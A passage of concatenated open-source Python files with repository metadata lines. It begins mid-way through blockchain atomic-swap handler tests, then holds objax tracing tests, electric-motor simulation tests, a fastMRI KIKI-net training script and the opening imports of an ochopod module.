swap_info.email_address_encrypted_optional = ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR
swap_info.sender_address = BOT_ADDRESS
swap_info.sender_address_non_local = BOT_ETHEREUM_ADDRESS
swap_info.receiver_address = ALICE_ADDRESS
swap_info.is_initiator = True
serialized_swap_info = swap_info.SerializeToString()
expected_bot_account = Account()
expected_bot_account.balance = 5000 - TOKENS_AMOUNT_TO_SWAP - SWAP_COMMISSION_AMOUNT
serialized_expected_bot_account = expected_bot_account.SerializeToString()
expected_zero_account = Account()
expected_zero_account.balance = SWAP_COMMISSION_AMOUNT
serialized_expected_zero_account = expected_zero_account.SerializeToString()
expected_state = {
BOT_ADDRESS: serialized_expected_bot_account,
ZERO_ADDRESS: serialized_expected_zero_account,
ADDRESS_TO_STORE_SWAP_INFO_BY: serialized_swap_info,
}
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
state_as_list = mock_context.get_state(addresses=[
ADDRESS_TO_STORE_SWAP_INFO_BY, BOT_ADDRESS, ZERO_ADDRESS,
])
state_as_dict = {entry.address: entry.data for entry in state_as_list}
assert expected_state == state_as_dict
def test_atomic_swap_init_already_taken_id():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with already existing swap id.
Expect: invalid transaction error is raised with atomic swap id has already been taken error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
swap_info = AtomicSwapInfo()
swap_info.swap_id = SWAP_ID
swap_info.state = AtomicSwapInfo.OPENED
swap_info.amount = TOKENS_AMOUNT_TO_SWAP
swap_info.created_at = CURRENT_TIMESTAMP
swap_info.email_address_encrypted_optional = ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR
swap_info.sender_address = BOT_ADDRESS
swap_info.sender_address_non_local = BOT_ETHEREUM_ADDRESS
swap_info.receiver_address = ALICE_ADDRESS
serialized_swap_info = swap_info.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
ADDRESS_TO_STORE_SWAP_INFO_BY: serialized_swap_info,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert 'Atomic swap ID has already been taken, please use a different one.' == str(error.value)
def test_atomic_swap_init_swap_no_block_config_info():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens when no block config settings.
Expect: invalid transaction error is raised with nlock config not found error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert 'Block config not found.' == str(error.value)
def test_atomic_swap_init_swap_no_block_info():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens when no needed block information.
Expect: invalid transaction error is raised with nlock config not found error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert f'Block {block_info_config.latest_block + 1} not found.' == str(error.value)
def test_atomic_swap_init_swap_receiver_address_invalid_type():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with invalid Alice node address.
Expect: invalid transaction error is raised with atomic swap id has already been taken error message.
"""
invalid_receiver_address = '112934y*(J#QJ3UH*PD(:9B&TYDB*I0b0a8edc4104ef28093ee30'
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=invalid_receiver_address,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert proto_error_msg(
AtomicSwapInitPayload,
{'receiver_address': ['Address is not of a blockchain token type.']}
) == str(error.value)
def test_atomic_swap_init_swap_wrong_commission_address():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with wrong commission settings.
Expect: invalid transaction error is raised with wrong commission address error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value='-1')
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert 'Wrong commission address.' == str(error.value)
def test_atomic_swap_init_swap_no_account_in_state():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens from non-existent bot address.
Expect: invalid transaction error is raised with not enough balance error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT))
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
total_amount = TOKENS_AMOUNT_TO_SWAP + SWAP_COMMISSION_AMOUNT
assert f'Not enough balance to perform the transaction in the amount (with a commission) {total_amount}.' \
== str(error.value)
def test_atomic_swap_init_swap_not_enough_balance():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens with not enough bot address balance.
Expect: invalid transaction error is raised with not enough balance error message.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
bot_account = Account()
bot_account.balance = 0
serialized_bot_account_balance = bot_account.SerializeToString()
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT))
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
BOT_ADDRESS: serialized_bot_account_balance,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
total_amount = TOKENS_AMOUNT_TO_SWAP + SWAP_COMMISSION_AMOUNT
assert f'Not enough balance to perform the transaction in the amount (with a commission) {total_amount}.' \
== str(error.value)
|
tests/tracing.py | kihyuks/objax | 715 | 12749308 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unitests for automatic variable tracing."""
import unittest
import numpy as np
import jax.numpy as jn
import objax
from objax.zoo.dnnet import DNNet
global_w = objax.TrainVar(jn.zeros(5))
global_b = objax.TrainVar(jn.zeros(1))
global_m = objax.nn.Sequential([objax.nn.Conv2D(2, 4, 3), objax.nn.BatchNorm2D(4)])
class TestTracing(unittest.TestCase):
"""Unit tests for variable tracing using."""
def test_function_global_vars(self):
def loss(x, y):
pred = jn.dot(x, global_w.value) + global_b.value
return 0.5 * ((y - pred) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'global_w': global_w, 'global_b': global_b})
def test_function_global_module(self):
def loss(x):
return jn.sum(global_m(x, training=True))
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, global_m.vars(scope='global_m.'))
def test_function_closure_vars(self):
w = objax.TrainVar(jn.zeros(5))
b = objax.TrainVar(jn.zeros(1))
def loss(x, y):
pred = jn.dot(x, w.value) + b.value
return 0.5 * ((y - pred) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'w': w, 'b': b})
def test_function_closure_module(self):
m = objax.nn.Sequential([objax.nn.Conv2D(1, 2, 3), objax.nn.BatchNorm2D(2)])
def loss(x):
return jn.sum(m(x, training=True))
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, m.vars(scope='m.'))
def test_lambda_with_closure_vars(self):
w = objax.TrainVar(jn.zeros(5))
b = objax.TrainVar(jn.zeros(1))
loss = lambda x, y: 0.5 * ((y - jn.dot(x, w.value) + b.value) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'w': w, 'b': b})
def test_multiline_lambda_with_closure_vars(self):
w = objax.TrainVar(jn.zeros(5))
b = objax.TrainVar(jn.zeros(1))
loss = lambda x, y: (
0.5 * ((y - jn.dot(x, w.value) + b.value) ** 2).mean()
)
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'w': w, 'b': b})
def test_closure_overrides_global_vars(self):
# Make sure that global variables are what we expect them to be
np.testing.assert_allclose(global_w.value, np.zeros(5))
np.testing.assert_allclose(global_b.value, np.zeros(1))
def _do_test():
# define local variable with the same name as existing global
global_w = objax.TrainVar(jn.ones(10))
# verify that global_w and global_b are what we expect them to be
np.testing.assert_allclose(global_w.value, np.ones(10))
np.testing.assert_allclose(global_b.value, np.zeros(1))
# loss function which mixes closure vars, global vars and closure var hides global var
def loss(x, y):
pred = jn.dot(x, global_w.value) + global_b.value
return 0.5 * ((y - pred) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'global_w': global_w, 'global_b': global_b})
_do_test()
# Make sure that global variables didn't change, in other words
# that _do_test operated on local variables
np.testing.assert_allclose(global_w.value, np.zeros(5))
np.testing.assert_allclose(global_b.value, np.zeros(1))
def test_typical_training_loop(self):
# Define model and optimizer
model = DNNet((32, 10), objax.functional.leaky_relu)
opt = objax.optimizer.Momentum(model.vars(), nesterov=True)
# Predict op
predict_op = lambda x: objax.functional.softmax(model(x, training=False))
self.assertDictEqual(objax.util.find_used_variables(predict_op),
model.vars(scope='model.'))
# Loss function
def loss(x, label):
logit = model(x, training=True)
xe_loss = objax.functional.loss.cross_entropy_logits_sparse(logit, label).mean()
return xe_loss
self.assertDictEqual(objax.util.find_used_variables(loss),
model.vars(scope='model.'))
# Gradients and loss function
loss_gv = objax.GradValues(loss, objax.util.find_used_variables(loss))
def train_op(x, y, learning_rate):
grads, loss = loss_gv(x, y)
opt(learning_rate, grads)
return loss
self.assertDictEqual(objax.util.find_used_variables(train_op),
{**model.vars(scope='loss_gv.model.'), **opt.vars(scope='opt.')})
def test_lambda_inside_function(self):
m = objax.nn.Sequential([objax.nn.Conv2D(1, 2, 3), objax.nn.BatchNorm2D(2)])
def loss(x):
get_logits = lambda inp: m(inp, training=True)
return jn.sum(get_logits(x))
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, m.vars(scope='m.'))
if __name__ == '__main__':
unittest.main()
|
tests/test_physical_systems/test_physical_systems.py | RaviPandey33/gym-electric-motor-1 | 179 | 12749321 | import numpy as np
from ..testing_utils import DummyConverter, DummyLoad, DummyNoise, DummyOdeSolver, DummyVoltageSupply, DummyElectricMotor,\
mock_instantiate, instantiate_dict
from gym_electric_motor.physical_systems import physical_systems as ps, converters as cv, electric_motors as em,\
mechanical_loads as ml, voltage_supplies as vs, solvers as sv
from gym.spaces import Box
import pytest
class TestSCMLSystem:
"""
Base Class to test all PhysicalSystems that derive from SCMLSystem
"""
class_to_test = ps.SCMLSystem
def mock_build_state(self, motor_state, torque, u_in, u_sup):
"""Function to mock an arbitrary build_state function to test the SCMLSystem
"""
self.motor_state = motor_state
self.torque = torque
self.u_in = u_in
self.u_sup = u_sup
return np.concatenate((
self.motor_state[:len(DummyLoad.state_names)], [torque],
self.motor_state[len(DummyLoad.state_names):], [u_sup]
))
@pytest.fixture
def scml_system(self, monkeypatch):
"""
Returns an instantiated SCMLSystem with Dummy Components and mocked abstract functions
"""
monkeypatch.setattr(
self.class_to_test,
'_build_state_names',
lambda _:
DummyLoad.state_names + ['torque'] + DummyElectricMotor.CURRENTS + DummyElectricMotor.VOLTAGES + ['u_sup']
)
monkeypatch.setattr(
self.class_to_test,
'_build_state_space',
lambda _, state_names: Box(
low=np.zeros_like(state_names, dtype=float),
high=np.zeros_like(state_names, dtype=float)
)
)
return self.class_to_test(
converter=DummyConverter(),
motor=DummyElectricMotor(),
load=DummyLoad(),
supply=DummyVoltageSupply(),
ode_solver=DummyOdeSolver(),
noise_generator=DummyNoise()
)
def test_reset(self, scml_system):
"""Test the reset function in the physical system"""
scml_system._t = 12
scml_system._k = 33
state_space = scml_system.state_space
state_positions = scml_system.state_positions
initial_state = scml_system.reset()
target = (np.array([0, 0, 0, 0, 0, 0, 560]) + scml_system._noise_generator.reset()) / scml_system.limits
assert np.all(initial_state == target), 'Initial states of the system are incorrect'
assert scml_system._t == 0, 'Time of the system was not set to zero after reset'
assert scml_system._k == 0, 'Episode step of the system was not set to zero after reset'
assert scml_system.converter.reset_counter == scml_system.electrical_motor.reset_counter \
== scml_system.mechanical_load.reset_counter == scml_system.supply.reset_counter,\
'The reset was not passed to all components of the SCMLSystem'
assert scml_system._ode_solver.t == 0, 'The ode solver was not reset correctly'
assert all(scml_system._ode_solver.y == np.zeros_like(
scml_system.mechanical_load.state_names + scml_system.electrical_motor.CURRENTS, dtype=float
)), ' The ode solver was not reset correctly'
def test_system_equation(self, scml_system):
"""Tests the system equation function"""
state = np.random.rand(4)
currents = state[[2, 3]]
torque = scml_system.electrical_motor.torque(currents)
u_in = np.random.rand(2)
t = np.random.rand()
derivative = scml_system._system_equation(t, state, u_in)
assert all(
derivative == np.array([torque, -torque, currents[0] - u_in[0], currents[1] - u_in[1]])
), 'The system equation return differs from the expected'
assert scml_system.mechanical_load.t == t, 'The time t was not passed through to the mech. load equation'
assert np.all(scml_system.mechanical_load.mechanical_state == state[:2]),\
'The mech. state was not returned correctly'
def test_simulate(self, scml_system):
"""Test the simulation function of the SCMLSystem"""
# Reset the system and take a random action
scml_system.reset()
action = scml_system.action_space.sample()
# Set a defined intitial state
ode_state = np.array([3, 4, 5, 6])
scml_system._ode_solver.set_initial_value(ode_state)
# Perform the action on the system
next_state = scml_system.simulate(action)
solver_state_me = scml_system._ode_solver.y[:len(DummyLoad.state_names)]
solver_state_el = scml_system._ode_solver.y[len(DummyLoad.state_names):]
torque = [scml_system.electrical_motor.torque(solver_state_el)]
u_sup = [scml_system.supply.u_nominal]
u_in = [u * u_sup[0] for u in scml_system.converter.u_in]
# Calculate the next state
desired_next_state = (
np.concatenate((solver_state_me, torque, solver_state_el, u_in, u_sup))
+ scml_system._noise_generator.noise()
) / scml_system.limits
# Assertions for correct simulation
assert all(desired_next_state == next_state), 'The calculated next state differs from the expected one'
assert scml_system.converter.action == action, 'The action was not passed correctly to the converter'
assert scml_system.converter.action_set_time == 0, 'The action start time was passed incorrect to the converter'
assert scml_system.converter.last_i_out == scml_system.electrical_motor.i_in(scml_system._ode_solver.last_y[2:])
def test_system_jacobian(self, scml_system):
"""Tests for the system jacobian function"""
el_jac = np.arange(4).reshape(2, 2)
el_over_omega = np.arange(4, 6)
torque_over_el = np.arange(6, 8)
# Set the el. jacobian returns to specified values
scml_system.electrical_motor.electrical_jac_return = (el_jac, el_over_omega, torque_over_el)
me_jac = np.arange(8, 12).reshape(2, 2)
me_over_torque = np.arange(12, 14)
# Set the mech. jabobian returns to specified values
scml_system.mechanical_load.mechanical_jac_return = me_jac, me_over_torque
sys_jac = scml_system._system_jacobian(0, np.array([0, 1, 2, 3]), [0, -1])
#
assert np.all(sys_jac[-2:, -2:] == el_jac), 'The el. jacobian is false'
assert np.all(sys_jac[:2, :2] == me_jac), 'The mech. jacobian is false'
assert np.all(sys_jac[2:, 0] == el_over_omega), 'the derivative of the el.state over omega is false'
assert np.all(sys_jac[2:, 1] == np.zeros(2))
assert np.all(sys_jac[:-2, 2:] == np.array([[72, 84], [78, 91]])), 'The derivative of the mech.state ' \
'over the currents is false'
|
fastmri_recon/training_scripts/single_coil/kikinet_sep_approach_af4_oasis.py | samiulshuvo/fastmri-reproducible-benchmark | 105 | 12749329 | import os.path as op
import random
import time
from keras.callbacks import TensorBoard, ModelCheckpoint, LearningRateScheduler
import tensorflow as tf
from tensorflow_addons.callbacks import TQDMProgressBar
from fastmri_recon.data.sequences.oasis_sequences import Masked2DSequence, KIKISequence
from fastmri_recon.models.functional_models.kiki_sep import kiki_sep_net
from fastmri_recon.models.utils.data_consistency import MultiplyScalar
from fastmri_recon.models.utils.non_linearities import lrelu
random.seed(0)
# paths
train_path = '/media/Zaccharie/UHRes/OASIS_data/'
n_train = 1000
n_val = 200
# generators
AF = 4
train_gen_last = Masked2DSequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, seed=0, val_split=0.1)
val_gen_last = train_gen_last.val_sequence
train_gen_last.filenames = random.sample(train_gen_last.filenames, n_train)
val_gen_last.filenames = random.sample(val_gen_last.filenames, n_val)
random.seed(0)
train_gen_i = KIKISequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, space='I', seed=0, val_split=0.1)
val_gen_i = train_gen_i.val_sequence
train_gen_i.filenames = random.sample(train_gen_i.filenames, n_train)
val_gen_i.filenames = random.sample(val_gen_i.filenames, n_val)
random.seed(0)
train_gen_k = KIKISequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, space='K', seed=0, val_split=0.1)
val_gen_k = train_gen_k.val_sequence
train_gen_k.filenames = random.sample(train_gen_k.filenames, n_train)
val_gen_k.filenames = random.sample(val_gen_k.filenames, n_val)
random.seed(0)
run_params = {
'n_convs': 16,
'n_filters': 48,
'noiseless': True,
'lr': 1e-3,
'activation': lrelu,
'input_size': (None, None, 1),
}
multiply_scalar = MultiplyScalar()
n_epochs = 50
def learning_rate_from_epoch(epoch):
return 10**(-(epoch // (n_epochs/3)) - 3)
def train_model(model, space='K', n=1):
print(model.summary(line_length=150))
run_id = f'kikinet_sep_{space}{n}_af{AF}_oasis_{int(time.time())}'
chkpt_path = f'checkpoints/{run_id}' + '-{epoch:02d}.hdf5'
print(run_id)
chkpt_cback = ModelCheckpoint(chkpt_path, period=n_epochs//2)
log_dir = op.join('logs', run_id)
tboard_cback = TensorBoard(
profile_batch=0,
log_dir=log_dir,
histogram_freq=0,
write_graph=True,
write_images=False,
)
lrate_cback = LearningRateScheduler(learning_rate_from_epoch)
tqdm_cb = TQDMProgressBar()
if space == 'K':
train_gen = train_gen_k
val_gen = val_gen_k
elif space == 'I':
if n == 2:
train_gen = train_gen_last
val_gen = val_gen_last
elif n == 1:
train_gen = train_gen_i
val_gen = val_gen_i
model.fit_generator(
train_gen,
steps_per_epoch=n_train,
epochs=n_epochs,
validation_data=val_gen,
validation_steps=1,
verbose=0,
callbacks=[tqdm_cb, tboard_cback, chkpt_cback, lrate_cback,],
# max_queue_size=35,
use_multiprocessing=True,
workers=35,
shuffle=True,
)
return model
# first K net training
model = kiki_sep_net(None, multiply_scalar, to_add='K', last=False, **run_params)
train_model(model, space='K', n=1)
model = kiki_sep_net(model, multiply_scalar, to_add='I', last=False, **run_params)
train_model(model, space='I', n=1)
model = kiki_sep_net(model, multiply_scalar, to_add='K', last=False, **run_params)
train_model(model, space='K', n=2)
model = kiki_sep_net(model, multiply_scalar, to_add='I', last=True, fastmri=False, **run_params)
train_model(model, space='I', n=2)
|
ochopod/core/core.py | autodesk-cloud/ochopod | 139 | 12749350 | #
# Copyright (c) 2015 Autodesk Inc.
# All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import ochopod
import pykka
import time
import uuid
from flask import Flask, request
from kazoo.exceptions import ConnectionClosedError, NodeExistsError
from kazoo.client import KazooClient, KazooState
